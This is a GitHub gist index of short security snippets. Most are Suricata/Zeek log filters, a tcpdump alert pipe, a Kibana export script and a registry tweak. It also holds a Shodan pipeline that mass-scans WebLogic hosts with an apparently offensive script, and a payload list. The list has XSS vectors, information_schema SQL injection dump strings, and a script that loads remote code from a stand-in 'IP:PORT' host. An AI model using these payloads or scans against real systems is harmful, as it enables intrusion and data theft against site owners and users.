Zobber
/ shodan_search
Created
April 6, 2020 15:50
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #shodan search --fields ip_str,port,data,product weblogic | .. | awk '{print $1}' | xargs -Iwl ./ws.py -t wl | sed 's/[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}/IP sondeada/g;' |
Zobber
/ suricata_jq
Created
April 6, 2020 15:59
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| jq 'select(.http and .http.http_method=="GET" and (.http.url | . and contains("zip"))) |.' eve.json |
Zobber
/ suricata_tcpdump
Created
April 6, 2020 15:59
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| sudo stdbuf -oL tcpdump -nK -ieth2 src port 555 and host 192.168.1.46 -A | stdbuf -oL egrep -o '\.\[.*\]' | stdbuf -oL awk '{print "Alerta detectada --- "$0}' |
Zobber
/ suricata_mailtrail
Created
April 6, 2020 16:01
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| jq -c 'select((.http or .tls) and .alert) | [.flow_id,.http.hostname,.http.http_method,.alert.signature,.src_ip,.dest_ip]' | sed 's/\"//g;s/\[//;s/\]//;' |
Zobber
/ zeek_mailtrail
Created
April 6, 2020 16:02
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| [.["id.orig_h"],.["id.orig_p"],"->",.["id.resp_h"],.["id.resp_p"],.method,.host,.status_code,.resp_fuids,.resp_mime_types,.request_body_len,.response_body_len,.uri]' |
Zobber
/ suricata_eternalblue
Created
April 6, 2020 16:16
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| cat eve.json |jq .flow_id |sort |uniq |grep -v null |xargs -I% grep % eve.json |ag 774699718895614 | jq -c 'select(.alert and .event_type and .metadata)|[.flow_id,.src_ip,.src_port,.dest_ip,.dest_port,.event_type,.alert.signature,.metadata.flowbits]' |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| "><details/open/ontoggle=confirm`/xss_by_Y000!/`> | |
| (select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x) | |
| CONCAT(0x5441424c45204e414d45533c62723e,(SELECT(@x)FROM(SELECT(@x:=0x00),(@NR:=0),(SELECT(0)FROM(INFORMATION_SCHEMA.TABLES)WHERE(TABLE_SCHEMA!=0x696e666f726d6174696f6e5f736368656d61)AND(0x00)IN(@x:=CONCAT(@x,LPAD(@NR:=@NR%2b1,2,0x30),0x3a20,table_name,0x3c62723e))))x)) | |
| "><script>setInterval(function(){d=document;z=d.createElement("script");z.src="//IP:PORT";d.body.appendChild(z)},0)</script> | |
| <object data='data:text/html;;;;;base64,PHNjcmlwdD5hbGVydGBZMDAwYDwvc2NyaXB0Pg=='></object> |
Zobber
/ Kibana Saved Object Exporter - Export saved objects from Kibana and SIEM rules
Created
April 7, 2020 02:08
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| ############################################################################### | |
| # Authentication Variables # | |
| ############################################################################### | |
| # Credentials in the form of user:password for Kibana | |
| kCreds=elastic:PASS | |
| ############################################################################### | |
| # Kibana Variables # |
Zobber
/ InstalTakeOwnership.reg
Created
April 11, 2020 01:02
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Windows Registry Editor Version 5.00 | |
| [HKEY_CLASSES_ROOT\*\shell\runas] | |
| @="Take Ownership" | |
| "NoWorkingDirectory"="" | |
| [HKEY_CLASSES_ROOT\*\shell\runas\command] | |
| @="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F" | |
| "IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F" |
Zobber
/ tools_hacking_firefox
Created
April 11, 2020 01:07
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| HackBar | |
| -Cookies Manager+ | |
| -User-Agent Switcher | |
| -Tamper Data | |
| -FoxyProxy Standard | |
| -Wappalyzer: | |
| -HttpRequester | |
| -RESTClient: | |
| -Tampermonkey | |
| -XSS Me |